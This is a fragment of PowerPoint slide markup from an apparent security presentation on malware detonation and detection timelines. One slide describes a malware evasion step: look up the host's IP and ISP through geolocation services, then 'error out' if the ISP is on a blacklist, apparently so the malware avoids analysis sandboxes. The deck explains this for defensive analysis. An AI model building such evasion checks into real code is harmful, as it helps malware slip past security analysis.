          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.maxmind.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/geoip/v2.1/city/me</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8207532" y="1807072"/>
            <a:ext cx="4113832" cy="435511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018672" y="4451512"/>
            <a:ext cx="3023285" cy="382308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://wtfismyip.com/json</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3296080" y="2933153"/>
            <a:ext cx="2196799" cy="10514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437586" y="3647515"/>
            <a:ext cx="1864242" cy="8039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525226" y="458116"/>
            <a:ext cx="6312593" cy="1375029"/>
            <a:chOff x="5416515" y="449175"/>
            <a:chExt cx="6189379" cy="1348190"/>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515" y="456158"/>
              <a:ext cx="1377076" cy="1285271"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6880836" y="449175"/>
              <a:ext cx="4725058" cy="1348190"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="932597">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>{</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr defTabSz="932597">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>   "</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>YourIPAddress</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>": "98.173.91.135",</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr defTabSz="932597">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>   "</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>YourLocation</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>": "Morristown, NJ, United States",</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr defTabSz="932597">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>   "</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>YourHostname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>": "wsip-98-173-91-135.lv.lv.cox.net",</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr defTabSz="932597">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2040" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>  "</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2040" kern="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>YourISP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2040" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>": "Cox Communications",</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr defTabSz="932597">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="853558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7864" y="1207706"/>
            <a:ext cx="5072622" cy="553244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7128124" y="936227"/>
            <a:ext cx="1997199" cy="5447512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle: Rounded Corners 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767864" y="1207706"/>
            <a:ext cx="4911535" cy="4408639"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10321"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5679400" y="3412025"/>
            <a:ext cx="1317836"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321944" y="6178245"/>
            <a:ext cx="2514205" cy="5958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836149" y="6616129"/>
            <a:ext cx="4480321" cy="670445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If ISP is on black list, error out with ‘bad ISP’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="855768" y="372393"/>
            <a:ext cx="10724938" cy="13519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488" dirty="0"/>
              <a:t>Network Vetting</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225" y="465239"/>
            <a:ext cx="1404490" cy="1310857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3693675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a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3390286306"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="841195" y="1183143"/>
          <a:ext cx="10972663" cy="25165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p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="454531706"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="851824" y="1183143"/>
          <a:ext cx="10972663" cy="253011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Where does Detonation Fit in?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597"/>
            <a:endParaRPr lang="en-US" sz="1836" kern="0" dirty="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fld id="{50B30FB7-BF62-4AFC-8D1D-EB795B714CE7}" type="slidenum">
              <a:rPr lang="en-US" sz="1836" kern="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="932597"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1836" kern="0" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="41" name="Group 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="830566" y="2092155"/>
            <a:ext cx="1688830" cy="795790"/>
            <a:chOff x="813490" y="2051319"/>
            <a:chExt cx="1655866" cy="780257"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16" name="Straight Connector 15"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2460889" y="2051319"/>
              <a:ext cx="8467" cy="78025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3490" y="2051319"/>
              <a:ext cx="1647399" cy="265009"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="932597"/>
              <a:r>
                <a:rPr lang="en-US" sz="1122" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Proactive threshold met</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Group 39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1224114" y="1683168"/>
            <a:ext cx="1575691" cy="1204777"/>
            <a:chOff x="1199356" y="1650315"/>
            <a:chExt cx="1544935" cy="1181261"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Connector 17"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2733870" y="1650315"/>
              <a:ext cx="10421" cy="11812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199356" y="1650315"/>
              <a:ext cx="1534514" cy="265009"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="932597"/>
              <a:r>
                <a:rPr lang="en-US" sz="1122" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Sonar verdict received</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Group 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2919866" y="1567653"/>
            <a:ext cx="1143168" cy="1338187"/>
            <a:chOff x="2862009" y="1537054"/>
            <a:chExt cx="1120855" cy="1312067"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Straight Connector 19"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2862009" y="1537054"/>
              <a:ext cx="10421" cy="131206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82851" y="1537054"/>
              <a:ext cx="1100013" cy="265009"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="932597"/>
              <a:r>
                <a:rPr lang="en-US" sz="1122" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>HFH Published</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9613502" y="1995363"/>
            <a:ext cx="1350328" cy="892582"/>
            <a:chOff x="9424993" y="1956416"/>
            <a:chExt cx="1323971" cy="875160"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="28" name="Straight Connector 27"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9424993" y="1956417"/>
              <a:ext cx="3297" cy="87515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438712" y="1956416"/>
              <a:ext cx="1310252" cy="437684"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="932597"/>
              <a:r>
                <a:rPr lang="en-US" sz="1122" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Signatures available</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375288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10" presetClass="exit" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -3.75E-6 -4.07407E-6 L -0.29687 -0.00115 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-14844" y="-69"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="225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200" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="200" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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245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200" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="40"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="20" dur="20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265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200" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="2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Graphic spid="1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Three Interacting Trends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Arc 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="14629972" flipH="1">
            <a:off x="7798270" y="-5173794"/>
            <a:ext cx="8730180" cy="10258637"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14449774"/>
              <a:gd name="adj2" fmla="val 398081"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="111010" tIns="55505" rIns="111010" bIns="55505" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932563"/>
            <a:endParaRPr lang="en-US" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2295115">
            <a:off x="6820197" y="1579127"/>
            <a:ext cx="5834216" cy="1699448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="none" lIns="111010" tIns="55505" rIns="111010" bIns="55505" numCol="1">
            <a:prstTxWarp prst="textArchDown">
              <a:avLst>
                <a:gd name="adj" fmla="val 439490"/>
              </a:avLst>
            </a:prstTxWarp>
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="soft" dir="t">
                <a:rot lat="0" lon="0" rev="10800000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d>
              <a:bevelT w="27940" h="12700"/>
              <a:contourClr>
                <a:srgbClr val="DDDDDD"/>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932563"/>
            <a:r>
              <a:rPr lang="en-US" sz="3599" b="1" kern="0" spc="150" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="25400" algn="tl" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Adversaries following customers to the cloud</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Freeform 28"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="12781221" flipH="1" flipV="1">
            <a:off x="5601306" y="2334891"/>
            <a:ext cx="3425889" cy="1891193"/>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FFC000"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1462700" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1599" kern="0" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FFFFFF">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="FFFFFF">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:srgbClr>
                  </a:gs>
                </a:gsLst>
                <a:path path="circle">
                  <a:fillToRect r="100000" b="100000"/>
                </a:path>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8090674" y="-44475"/>
            <a:ext cx="4344920" cy="3189860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="111010" tIns="55505" rIns="111010" bIns="55505" rtlCol="0">
